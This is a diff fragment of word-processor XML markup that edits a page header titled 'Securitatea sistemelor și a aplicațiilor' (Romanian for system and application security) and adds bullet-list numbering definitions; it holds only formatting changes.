       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -1989,22 +6104,13 @@
       <w:pBdr>
         <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
       </w:pBdr>
+      <w:spacing w:before="0" w:after="200"/>
       <w:jc w:val="center"/>
       <w:rPr/>
     </w:pPr>
     <w:r>
       <w:rPr/>
       <w:t>Securitatea sistemelor și a aplicațiilor</w:t>
-    </w:r>
-  </w:p>
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Header"/>
-      <w:spacing w:before="0" w:after="200"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
     </w:r>
   </w:p>
 </w:hdr>
@@ -2814,6 +6920,143 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
@@ -2952,6 +7195,9 @@
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>
